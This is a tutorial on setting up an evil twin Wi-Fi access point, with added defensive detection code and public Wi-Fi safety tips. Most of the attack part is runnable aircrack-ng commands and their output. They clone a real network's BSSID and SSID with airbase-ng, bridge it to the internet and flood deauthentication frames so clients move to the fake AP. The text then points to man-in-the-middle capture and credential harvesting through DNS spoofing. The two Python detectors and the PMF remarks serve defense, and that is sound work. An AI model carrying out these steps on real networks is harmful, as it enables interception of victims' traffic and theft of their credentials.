What is an Evil Twin Access Point?
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.
Devices that connect to Wi-Fi networks, such as laptops, tablets, and smartphones, have no way to distinguish between two networks with the same SSID. This enables attackers to set up malicious wireless networks that capture traffic and extract sensitive information from victims.
Enable Monitor Mode
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.
Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).
Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it’s functioning correctly by entering the following command:
airmon-ng check kill
This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.
The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.
airmon-ng start wlan0
This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.
Locate the Target Wireless Network
The second step is to scan for nearby wireless routers with airodump-ng on the monitor-mode interface and locate the Wi-Fi network you want to clone. The scan output looks like this:
CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

28:EF:01:34:64:92  -29       19      1    0   6  54e  WPA2  CCMP    PSK   Linksys
28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   SkyNet
28:EF:01:34:64:91  -29       19      1    0   1  54e  WPA2  CCMP    PSK   TP-LINK
28:EF:02:33:38:86  -42       17      0    0  11  54e  WPA2  CCMP    PSK   CISCO-Net

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1    0        1
The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.
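The same scan table is what a defender watches to spot a twin: a managed SSID beaconed by an unknown BSSID, or beaconed with weaker security than the real network uses. The following is an added example of mine, not code from the tutorial or from the aircrack-ng project. It parses airodump-ng-style AP rows and compares them with a baseline of the access points you actually operate. The scan text reuses the four rows above plus one constructed open "SkyNet" row with the made-up BSSID 02:11:22:33:44:55, and the baseline is constructed as well.

```python
"""Evil-twin indicators from an airodump-ng style scan (added example)."""
import re
from collections import defaultdict

# One AP row: BSSID PWR Beacons #Data #/s CH MB ENC [CIPHER AUTH] ESSID
AP_ROW = re.compile(
    r"^([0-9A-F]{2}(?::[0-9A-F]{2}){5})\s+(-?\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+"
    r"(\d+)\s+(\S+)\s+(\S+)\s*(.*)$",
    re.IGNORECASE,
)

# Constructed scan: the four rows from the tutorial plus a constructed open
# "SkyNet" beaconed by an unknown BSSID (02:11:22:33:44:55).
SAMPLE_SCAN = """\
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
28:EF:01:34:64:92  -29       19      1    0   6  54e  WPA2  CCMP    PSK   Linksys
28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   SkyNet
02:11:22:33:44:55  -30       40      0    0   6  54e  OPN                 SkyNet
28:EF:01:34:64:91  -29       19      1    0   1  54e  WPA2  CCMP    PSK   TP-LINK
28:EF:02:33:38:86  -42       17      0    0  11  54e  WPA2  CCMP    PSK   CISCO-Net

BSSID              STATION            PWR   Rate  Lost  Packets  Probes
28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1    0        1
"""

# Constructed baseline: the access points the defender actually operates.
BASELINE = {
    "SkyNet":  {"bssids": {"28:EF:01:35:34:85"}, "enc": "WPA2"},
    "Linksys": {"bssids": {"28:EF:01:34:64:92"}, "enc": "WPA2"},
}


def parse_ap_rows(scan_text):
    """Return one dict per AP row; the station table at the bottom is ignored."""
    rows = []
    for line in scan_text.splitlines():
        m = AP_ROW.match(line.strip())
        if not m:
            continue
        bssid, pwr, _beacons, _data, _rate, ch, _mb, enc, rest = m.groups()
        tokens = rest.split()
        # Open networks print no CIPHER/AUTH columns, so the ESSID starts at once.
        essid = " ".join(tokens if enc.upper() == "OPN" else tokens[2:])
        rows.append({"bssid": bssid.upper(), "pwr": int(pwr), "ch": int(ch),
                     "enc": enc.upper(), "essid": essid})
    return rows


def find_evil_twin_indicators(rows, baseline):
    """Compare scan rows with a baseline of managed APs.

    Alerts on: a managed ESSID beaconed by a BSSID not in the baseline
    (a twin on a different radio), and a baseline BSSID beaconing with
    different security than expected (an open clone of a WPA2 network).
    Unmanaged ESSIDs seen from several BSSIDs are reported as informational.
    """
    alerts = []
    by_essid = defaultdict(list)
    for row in rows:
        by_essid[row["essid"]].append(row)
    for essid, seen in by_essid.items():
        known = baseline.get(essid)
        if known is None:
            if len({r["bssid"] for r in seen}) > 1:
                alerts.append(f"INFO unmanaged ESSID '{essid}' beaconed by "
                              f"{len(seen)} BSSIDs")
            continue
        for r in seen:
            if r["bssid"] not in known["bssids"]:
                alerts.append(f"ROGUE BSSID {r['bssid']} beacons managed ESSID "
                              f"'{essid}' on ch {r['ch']} with {r['enc']}")
            elif r["enc"] != known["enc"]:
                alerts.append(f"SECURITY MISMATCH {r['bssid']} ('{essid}') "
                              f"beacons {r['enc']}, expected {known['enc']}")
    return alerts


def run_demo():
    alerts = find_evil_twin_indicators(parse_ap_rows(SAMPLE_SCAN), BASELINE)
    for a in alerts:
        print(a)
    return alerts


if __name__ == "__main__":
    run_demo()
```

Run as-is it reports one rogue BSSID for SkyNet and nothing for the other networks. Note that airodump-ng keys its table by BSSID, so a clone that copies the real BSSID on the same channel (as the airbase-ng command in this tutorial does) will not show up as a second row; the baseline comparison still catches a clone on another radio or one that drops to open authentication, which is the common case for credential-harvesting twins.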
Create the Evil Twin
Once you’ve found the network which you wish to clone, run the following command in another terminal:
airbase-ng -a 28:EF:01:35:34:85 -e SkyNet -c 6 wlan0mon

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.
This command creates an evil twin network with the SSID SkyNet; however, it cannot provide internet access yet.
Provide Internet Access to the Evil Twin
I will add a bridge interface called fake; you can name it whatever you like.
brctl addbr fake
Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).
brctl addif fake eth0
brctl addif fake at0
Assign IP addresses to the interface and bring them up using ifconfig:
ifconfig at0 0.0.0.0 up
ifconfig fake up
You can take a look at the bridge network interface with ifconfig:
ifconfig

at0       Link encap:Ethernet  HWaddr 74:85:2a
          inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)

eth0      Link encap:Ethernet  HWaddr c8:bc:c8
          inet addr:10.0.0.19  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::cabc:a6c1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:640 errors:0 dropped:0 overruns:0 frame:0
          TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:457344 (446.6 KiB)  TX bytes:94347 (92.2 KiB)
          Interrupt:17

fake      Link encap:Ethernet  HWaddr 74:85:2a
          inet addr:10.0.0.194  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80:::fe97:5b08/64 Scope:Link
          inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:859 errors:0 dropped:0 overruns:0 frame:0
          TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:492405 (480.8 KiB)  TX bytes:130130 (127.0 KiB)
Kick Wireless Clients from the Legitimate AP
The next step is to kick wireless clients off the legitimate AP, in my case the SkyNet network. You can do this with aireplay-ng.
aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon
This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.
As you can see in the output below, a client has associated with my evil twin. This information is found in the airbase-ng terminal (client 28:EF:01:23:46:68 associated).

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
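The deauthentication step is the loudest part of this attack: a real access point seldom deauthenticates a client more than occasionally, and almost never deauthenticates the broadcast address, whereas a flood of 1000 deauth frames with no client specified goes to ff:ff:ff:ff:ff:ff at a high rate. A wireless IDS can therefore detect it by counting. The following is an added example of mine, not code from the tutorial or from the aircrack-ng project. It takes (timestamp, subtype, bssid, destination) records as a monitor-mode capture would yield after parsing (the parsing step is not shown), keeps a sliding window per BSSID, and raises an alert when the count crosses a threshold. The frame list is constructed and reuses the BSSID and station address from the scan above; the 10-second window and the threshold of 20 frames are assumptions to tune for your environment.

```python
"""Deauthentication-flood detector over monitor-mode frame records (added example)."""
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"


def detect_deauth_floods(frames, window_s=10.0, threshold=20):
    """Sliding-window count of deauth/disassoc frames per BSSID.

    frames: iterable of (timestamp_s, subtype, bssid, destination) tuples.
    An alert is raised the first time a BSSID accumulates `threshold` such
    frames inside `window_s` seconds; it re-arms once the rate drops.
    Broadcast destinations are counted separately because a legitimate AP
    rarely deauthenticates ff:ff:ff:ff:ff:ff, while a flood with no client
    specified does exactly that.
    """
    alerts = []
    recent = defaultdict(deque)   # bssid -> deque of (timestamp, destination)
    fired = set()                 # BSSIDs currently above threshold
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        key = bssid.upper()
        q = recent[key]
        q.append((ts, dst.upper()))
        while q and q[0][0] < ts - window_s:   # drop frames outside the window
            q.popleft()
        if len(q) >= threshold:
            if key not in fired:
                fired.add(key)
                alerts.append({
                    "bssid": key,
                    "count": len(q),
                    "broadcast": sum(1 for _, d in q if d == BROADCAST),
                    "start": q[0][0],
                    "end": ts,
                })
        else:
            fired.discard(key)
    return alerts


def constructed_frames():
    """Constructed capture: a few ordinary deauths, one beacon, then a burst."""
    ap = "28:EF:01:35:34:85"          # BSSID from the tutorial's scan
    client = "28:EF:01:23:46:68"      # station from the tutorial's scan
    frames = [
        (0.0, "deauth", ap, client),   # occasional unicast deauths are normal
        (30.0, "deauth", ap, client),
        (60.0, "beacon", ap, BROADCAST),
        (60.5, "deauth", ap, client),
    ]
    # 40 broadcast deauths in two seconds, as a flood looks on the air.
    frames += [(100.0 + i * 0.05, "deauth", ap, BROADCAST) for i in range(40)]
    return frames


def run_demo():
    alerts = detect_deauth_floods(constructed_frames())
    for a in alerts:
        print(f"DEAUTH FLOOD from {a['bssid']}: {a['count']} frames "
              f"({a['broadcast']} broadcast) between t={a['start']:.2f}s "
              f"and t={a['end']:.2f}s")
    return alerts


if __name__ == "__main__":
    run_demo()
```

The three benign unicast deauths spread over a minute never trip the threshold; the burst fires one alert on its twentieth frame, with all twenty destined to the broadcast address. On the mitigation side, 802.11w protected management frames (PMF) make forged deauthentication and disassociation frames fail integrity checking on clients that negotiate them, which removes the lever this step depends on; detection remains useful for the clients and networks that do not support PMF.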
At this point, all of the victim's traffic passes through the attacker's machine, so the attacker can capture sensitive information; this is effectively a man-in-the-middle attack.
The attacker can then perform further attacks such as DNS spoofing, which redirects the victim to a cloned or fake login page. Once the victim tries to log in, the attacker harvests the credentials.
In today’s digital age, using public Wi-Fi networks has become a common practice for many people. However, it’s important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.
To stay safe when using public Wi-Fi hotspots, there are a few key things to keep in mind. Firstly, always make sure that you are connecting to a legitimate network. Hackers often set up fake Wi-Fi hotspots with names that sound similar to the real thing, in order to trick people into connecting to them. If you’re not sure whether a network is legitimate or not, it’s best to err on the side of caution and avoid connecting to it.
Secondly, it’s important to remember that public Wi-Fi networks are generally not secure, and any information that you send or receive over these networks may be vulnerable to interception by hackers. Therefore, it’s best to avoid making any financial transactions or entering sensitive personal information (such as passwords or account numbers) when using public Wi-Fi. Stick to basic web surfing and avoid entering any confidential information.
Finally, if you see two networks with identical names, it’s best to avoid connecting to either one of them. This could be a sign that someone is trying to set up a fake network in order to steal your personal information.
In conclusion, while public Wi-Fi hotspots can be a convenient way to access the internet on the go, it’s important to be aware of the risks associated with using these networks. By taking a few simple precautions, such as connecting only to legitimate networks and avoiding sensitive transactions, you can help to keep your personal information safe and secure.